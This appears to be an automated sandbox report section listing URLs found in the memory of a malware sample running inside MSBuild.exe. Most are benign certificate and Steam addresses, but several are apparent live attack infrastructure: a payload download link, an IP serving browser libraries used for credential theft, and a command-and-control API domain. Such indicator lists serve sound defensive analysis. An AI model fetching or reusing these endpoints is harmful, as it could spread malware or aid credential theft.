Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, a43486128347[1].exe.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeJ
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exej
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000004.00000002.2202720214.000000002047C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2224013548.000000003E1AE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2218332574.00000000322C9000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, a43486128347[1].exe.4.dr, nss3.dll.4.dr, CBFCFBFBFB.exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: MSBuild.exe, MSBuild.exe, 00000004.00000002.2211910779.00000000263E4000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000004.00000002.2196301722.0000000019EB0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2201341180.000000001FE5D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://49.12.197.9
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9//w
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/freebl3.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/l
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/mozglue.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/msvcp140.dll5
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/nss3.dllrsg47
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000DE8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/softokn3.dll
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000055D000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/sqlp.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dll
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9/vcruntime140.dllU
Source: MSBuild.exe, 00000004.00000002.2190030987.0000000000582000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://49.12.197.9ECAAFH
Source: HCAEHD.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/1$~
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/Ri
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/api
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/api;
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/api;$~(9
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001382000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store/bixd4
Source: MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://advocachark.store:443/api
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, BAECFC.4.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: HCAEHD.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HCAEHD.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HCAEHD.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.co
Source: MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2180466192.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
Source: MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
